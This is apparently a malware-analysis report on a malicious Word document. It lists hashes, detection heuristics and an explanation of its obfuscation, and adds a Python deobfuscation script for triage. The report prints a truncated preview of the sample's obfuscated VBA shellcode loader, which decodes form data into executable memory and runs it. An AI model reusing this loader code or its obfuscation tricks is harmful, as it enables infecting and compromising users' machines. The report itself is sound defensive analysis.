Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5209e6d4028b82cd…

MALICIOUS

Office (OLE)

Size: 235.0 KB
Created: 2018-02-28 15:05:00
Authoring application: Microsoft Office Word
First seen: 2019-03-10
MD5: 3b338b9fb60218e907da3a90a47354c6
SHA-1: 1dcc82190b3a279e915397de14f8e477a26efee9
SHA-256: 5209e6d4028b82cd1a59b737ea34a69cfa924a0d690c57b52eaeb2d31868d88f
Risk score: 142

Malware Insights

MITRE ATT&CK
  T1059.005 Command and Scripting Interpreter: Visual Basic
  T1566.001 Phishing: Spearphishing Attachment

The document contains VBA macros with a Document_Open handler, the auto-execution entry point macro droppers rely on, and the SE_ENABLE_LURE heuristic indicates the document body asks the user to enable macros, which is what lets that handler run. The ClamAV signature Doc.Downloader.Macro-6539595-0 corroborates the verdict. The macro source is heavily obfuscated: dictionary-word identifiers, integer constants split into arithmetic (124 - 62 + 9658 for 9720), string assignments that are never used, conditional-compilation guards padded with always-true comparisons, and junk statements that call the built-in financial function Pmt and discard the result. Underneath that noise the extracted preview has the structure of an in-process shellcode loader rather than a plain URL downloader: it reads a value from a UserForm control (unproficiency.mariposa), decodes it through a helper in another module (clannishness.blasphemously), pulls the Variant's data pointer out at offset 8 with VarPtr and a copy of 8 or 4 bytes chosen by the Win64 branch, copies 5,883 bytes into a region obtained from a six-argument call whose folded arguments are (-1, ByRef out-pointer, 0, ByRef 9720, 4096, 64), the calling shape of NtAllocateVirtualMemory(current process, &BaseAddress, 0, &RegionSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE), and then passes the region address plus an offset (2064 or 4240, again per branch) as the third argument of another routine. The Declare statements that would bind the obfuscated names to Win32 exports lie beyond the truncated preview, so the API identification is an inference from argument counts and constants, not a confirmed import. Whether the injected code goes on to fetch a second stage, as the ClamAV name suggests, cannot be settled from the macro source alone; the decoded form data or a sandbox run is needed for that.

Heuristics (5)

  • ClamAV: Doc.Downloader.Macro-6539595-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected [medium, 1 related finding] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    The macro project defines a Document_Open handler, which Word runs automatically once the document is opened with macros enabled or the user clicks Enable Content
  • Macro/content-enable lure [medium] (SE_ENABLE_LURE)
    Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/  (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#  (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/  (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/  (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#  (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#  (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/  (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main  (in document text, OLE body)
    All eight URLs are XML namespace identifiers (Adobe XMP, RDF, Dublin Core, Photoshop, DrawingML) carried in the metadata of an embedded image; they are never contacted at runtime and are not network indicators. No URL was extracted from the macro code itself, which fits the loader structure seen in the extracted macro, where the data comes from a UserForm control rather than from a download.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   12547 bytes
SHA-256: 45c11bd9fae4876486d9c842cdff92d0a5b7f6afe05b7ca253ba3b72eef8f05d

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True




Function mnemonic(puffing)
Dim armadillidium As Byte
Dim grandma As Variant
Dim learned As Variant
Dim cara As Integer
#If (77 - 70 + 393 + 80 - 98 + 318) > ((34 - 94 + 380) - (99 - 5 + 446) * 1) And ((16 - 56 + 68) - (123 - 63 - 32)) * 2 < (Win64) Then
Dim einstein As Integer
Dim permissibly As LongPtr
bursitis = 72 - 85 + 21
Dim electrophorus As LongPtr
Dim hushedup As Integer
Dim convent As Byte
Dim glac As LongPtr
Dim patrician As Variant
introductory = VarPtr(permissibly)
cushy = deuce(introductory, VarPtr(puffing) + (102 - 71 - 23), bursitis)
#End If
#If (99 - 20 + 321 + 12 - 1 + 289) > ((73 - 94 + 341) - (85 - 62 + 517) * 1) And Not ((111 - 61 - 22) - (95 - 100 + 33)) * 2 < (Win64) Then
Dim permissibly As Long
bursitis = 73 - 53 - 16
Dim electrophorus As Long
Dim glac As Long
#End If
introductory = VarPtr(permissibly)
cushy = slumberer(introductory, VarPtr(puffing) + (16 - 46 + 38), bursitis)
necropolis = 75 - 95 + 19
electrophorus = 105 - 21 - 84
maggiore = 32 - 111 + 79
glac = 124 - 62 + 9658
cloyment = 13 - 88 + 4171
aves = 115 - 30 - 21
brashness = hydropathic(ByVal necropolis, _
electrophorus, ByVal maggiore, glac, ByVal cloyment, _
ByVal aves)
molise = "cesspool"

molise = throughput

coistril = slumberer(electrophorus, permissibly, 73 - 76 + 5886)
burhinidae = 10 + 10
 Pmt 0, burhinidae, 38368, 35856, 4

mnemonic = electrophorus
End Function
Sub undifferentiated()
Dim remedial As Byte
Dim pachycephala As Byte
unproficiency.mariposa.Value = Day(#12/5/2013#)
varday = door = "doubloon"
afterthought = pound
behoof = "conjugate"
ononis = "coper"
pillion = "caravel"

hominem = epicene
felt = "rebirth"
Set disinfestation = unproficiency.mariposa.SelectedItem
bastnasite = 30 + 57
 Pmt 0, bastnasite, 32096, 36842, 4

waratah = disinfestation.Name
dislodge = 11 - 44 + 7877
miserably = Right(waratah, dislodge)
facon = clannishness.blasphemously(miserably)
nwill = 24 + 26
 Pmt 0, nwill, 36699, 27856, 7

agastache = "carbonated"
#If (122 - 113 + 391 + 69 - 85 + 316) > ((3 - 13 + 330) - (77 - 121 + 584) * 1) And ((70 - 22 - 20) - (28 - 92 + 92)) * 2 < (Win64) Then
Dim corps As Variant
Dim cylindroid As LongPtr
Dim parachutist As LongPtr
Dim bijouterie As Variant
Dim cocoon As LongPtr
Dim acquainted As LongPtr
Dim forsooth As LongPtr
confabulation = 5 - 120 + 2179
#End If
#If (94 - 107 + 413 + 24 - 79 + 355) > ((30 - 102 + 392) - (45 - 34 + 529) * 1) And Not ((83 - 126 + 71) - (10 - 108 + 126)) * 2 < (Win64) Then
Dim swimming As Long
Dim parachutist As Long
Dim nonextensile As Byte
Dim cylindroid As Long
Dim cocoon As Long
analysis = 74 - 120 + 827
Dim acquainted As Long
Dim forsooth As Long
confabulation = analysis + 3459
#End If
fifties = 28 - 74 + 46
invariable = "polar"
hd = "conceited"
herding = 91 - 70 + 4075
flosculi = 10 + 23
 Pmt 0, flosculi, 19848, 31252, 2

ironworks = "ascaphidae"
gunmetal = "abused"
flypaper = "chlorination"
hypermedia = "susceptivity"
amianthus = 15 + 32
 Pmt 0, amianthus, 5828, 45459, 5

wesleyanism = facon
blastomycete = "concussion"
circulate = "hemiacetal"
cylindroid = mnemonic(wesleyanism)
breakdown = "asteism"
Dim scummy As Byte
Dim boswellia As Long
cocoon = 84 - 30 - 54
parachutist = cylindroid + confabulation
acquainted = 92 - 89 + 201524
forsooth = 88 - 89 + 3501
inconceivability = cyclicity(acquainted, cocoon, parachutist, cocoon, cocoon, cocoon, cocoon)
carya = 7 + 1
 Pmt 0, carya, 6929, 57519, 5

End Sub

Function deuce(immediateness, catlike, crossbencher)
Dim barkeeper As String
Dim mimium As Long
Dim minded As LongPtr
Dim hollowware As LongPtr
Dim citadel As LongPtr
Dim mycrosporidia As String
Dim diehard As LongPtr
Dim metals As LongPtr
throughput = "nonpublic"
... (truncated)
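Deobfuscation pass, added here as an example and not part of the report or of oletools: it folds the split-integer arithmetic in lines taken from the preview above, reduces the #If guards to the comparison that is left once the padding is evaluated, and resolves the numeric arguments of the obfuscated calls so they can be compared with Win32 API prototypes. The three-line Document_Open stub at the top of the sample is constructed for the demo (the handler the OLE_VBA_DOCOPEN heuristic reports lies outside the visible preview); the procedure names hydropathic, slumberer and deuce are the sample's own, and the script does not guess the exports behind them.

```python
"""Constant-folding triage for arithmetic-obfuscated VBA (added example).

Not code from the report or from oletools. Input is decoded VBA source text
such as olevba's output. Resolution follows source order only: a name passed
ByRef and overwritten by the callee keeps its old value in the resolved
argument list, so treat resolved values as hints, not facts.
"""
import re

# Sample input: lines copied from the extracted preview, plus a constructed
# Document_Open stub (the real handler's body is outside the visible preview).
SAMPLE_VBA = """\
Sub Document_Open()
undifferentiated
End Sub
#If (77 - 70 + 393 + 80 - 98 + 318) > ((34 - 94 + 380) - (99 - 5 + 446) * 1) And ((16 - 56 + 68) - (123 - 63 - 32)) * 2 < (Win64) Then
bursitis = 72 - 85 + 21
cushy = deuce(introductory, VarPtr(puffing) + (102 - 71 - 23), bursitis)
#End If
#If (99 - 20 + 321 + 12 - 1 + 289) > ((73 - 94 + 341) - (85 - 62 + 517) * 1) And Not ((111 - 61 - 22) - (95 - 100 + 33)) * 2 < (Win64) Then
#End If
necropolis = 75 - 95 + 19
electrophorus = 105 - 21 - 84
maggiore = 32 - 111 + 79
glac = 124 - 62 + 9658
cloyment = 13 - 88 + 4171
aves = 115 - 30 - 21
brashness = hydropathic(ByVal necropolis, _
electrophorus, ByVal maggiore, glac, ByVal cloyment, _
ByVal aves)
burhinidae = 10 + 10
 Pmt 0, burhinidae, 38368, 35856, 4
coistril = slumberer(electrophorus, permissibly, 73 - 76 + 5886)
"""

_CHAIN = re.compile(r"(?<![\w.$])-?\d+(?:\s*[-+*]\s*\d+)+")   # e.g. 72 - 85 + 21
_PAREN = re.compile(r"\(\s*(-?\d+)\s*\)")                      # (8) -> 8
_CMP = re.compile(r"(-?\d+)\s*(<>|>=|<=|=|<|>)\s*(-?\d+)")     # numeric comparisons
_ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(-?\d+)\s*$")
_CALL = re.compile(r"^\s*\w+\s*=\s*(\w+)\((.*)\)\s*$")
_JUNK = re.compile(r"^\s*Pmt\b")   # financial function invoked as a statement, result discarded
_ENTRY = re.compile(r"^\s*(?:Private\s+|Public\s+)?Sub\s+"
                    r"(Document_Open|AutoOpen|Auto_Open|Workbook_Open|AutoExec)\b", re.I)


def _eval_chain(expr):
    """Evaluate an integer chain of + - * (VBA binds * tighter than + and -)."""
    terms, sign = [], 1
    for term in re.split(r"\s*([-+])\s*", expr.strip()):
        if term in ("+", "-"):
            sign = 1 if term == "+" else -1
        elif term:
            prod = 1
            for factor in term.split("*"):
                prod *= int(factor)
            terms.append(sign * prod)
    return sum(terms)


def fold_constants(line):
    """Collapse numeric sub-expressions, innermost first, until nothing changes."""
    prev = None
    while prev != line:
        prev = line
        line = _CHAIN.sub(lambda m: str(_eval_chain(m.group(0))), line)
        line = _PAREN.sub(r"\1", line)
    return line


def simplify_condition(line):
    """Fold a #If line, decide numeric comparisons and drop 'True And' padding."""
    def decide(m):
        a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
        ok = {"=": a == b, "<>": a != b, "<": a < b, ">": a > b,
              "<=": a <= b, ">=": a >= b}[op]
        return "True" if ok else "False"
    return re.sub(r"\bTrue And\s+", "", _CMP.sub(decide, fold_constants(line)))


def join_continuations(text):
    """Merge VBA ' _' continuations so a multi-line call folds as one line."""
    out = []
    for raw in text.splitlines():
        if out and out[-1].endswith(" _"):
            out[-1] = out[-1][:-2] + " " + raw.strip()
        else:
            out.append(raw.rstrip())
    return out


def _resolve(arg, env):
    arg = re.sub(r"^(?:ByVal|ByRef)\s+", "", arg.strip())
    return int(arg) if re.fullmatch(r"-?\d+", arg) else env.get(arg, arg)


def analyze(vba_text):
    """Walk the source in order and collect entry points, simplified guards,
    folded assignments, resolved call arguments and junk-statement count."""
    env, rep = {}, {"entry_points": [], "conditionals": [], "assignments": {},
                    "calls": [], "junk_calls": 0}
    for line in join_continuations(vba_text):
        folded = fold_constants(line)
        if m := _ENTRY.match(line):
            rep["entry_points"].append(m.group(1))
        elif line.lstrip().startswith("#If"):
            rep["conditionals"].append(simplify_condition(folded).strip())
        elif _JUNK.match(folded):
            rep["junk_calls"] += 1
        elif m := _ASSIGN.match(folded):
            env[m.group(1)] = int(m.group(2))
            rep["assignments"].setdefault(m.group(1), []).append(env[m.group(1)])
        elif m := _CALL.match(folded):
            rep["calls"].append((m.group(1), [_resolve(a, env) for a in m.group(2).split(",")]))
    return rep
```

Run analyze() over the whole macros.bas rather than the excerpt. On the excerpt the two guards reduce to `0 < (Win64)` and `Not 0 < (Win64)`, so the arithmetic is padding around a single Win64 test; the copy length in each branch (8 bytes where LongPtr is declared, 4 where Long is) identifies the 64-bit path without needing the compiler's value for Win64. The resolved vector for hydropathic, (-1, 0, 0, 9720, 4096, 64) with the second and fourth arguments passed ByRef, is what you compare against API prototypes; the Declare lines that bind the name are in the truncated part of the module.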